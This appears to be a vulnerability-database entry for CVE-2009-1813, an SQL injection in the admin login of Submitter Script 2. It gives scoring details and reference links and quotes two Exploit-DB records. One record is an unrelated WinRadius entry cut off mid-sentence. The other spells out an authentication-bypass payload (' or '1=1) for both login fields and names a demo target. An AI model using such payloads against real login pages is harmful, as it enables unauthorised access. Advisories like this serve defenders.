CVE-2009-1813
Published 2009-05-29
Priority: P3 · 45 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.31% (81.3th percentile)
Multiple SQL injection vulnerabilities in admin/index.php in Submitter Script 2 allow remote attackers to execute arbitrary SQL commands via (1) the uNev parameter (aka the username field) or (2) the uJelszo parameter (aka the Password field).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| submitterscript | submitterscript | — | — |
No detection rules found.
Exploit-DB
WinRadius Server 2009 - Denial of Service
exploitdb·2012-05-29
CVE-2012-3816 WinRadius Server 2009 - Denial of Service
---
Title: WinRadius Server Denial Of Service Vulnerability
Software : WinRadius
Software Version : v2009
Vendor: http://www.elite-school.com/saas/WinRadius/
Vulnerability Published : 2012-05-27
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)
Bug Description :
WinRadius is a standard RADIUS server for network authentication, accounting. It's easy to use, and can be used for telecommunication accounting platform, PPP authentication, accounting server. It supports PPP, PPPoE, PPTP, VPN, VoIP, ADSL, Cable Modem, CDMA, GSM, GPRS, WLAN(802.1x), etc.
WinRadius server would bind UDP port 1812 and 1813, but it does not validate the password option size leading to a Denial Of Service flaw while send
Exploit-DB
Submitter Script - Authentication Bypass
exploitdb·2009-05-14
CVE-2009-1813 Submitter Script - Authentication Bypass
---
Submitter Script 2(Auth Bypass) SQL Injection Vulnerability
Founder : ThE g0bL!N
Vendor: http://submitterscript.com/
More info: http://submitterscript.com/products.php
Auth Bypass
http://victim/[path]/admin/
username:' or '1=1
Password:' or '1=1
Dem0
----
http://demo.submitterscript.com/admin/
Greeting To ALL My Friends (Dz)
# milw0rm.com [2009-05-14]
No writeups or analysis indexed.
http://osvdb.org/54475
http://secunia.com/advisories/35088
http://www.securityfocus.com/bid/34970
http://www.vupen.com/english/advisories/2009/1327
https://exchange.xforce.ibmcloud.com/vulnerabilities/50552
https://www.exploit-db.com/exploits/8683
2009-05-29
Published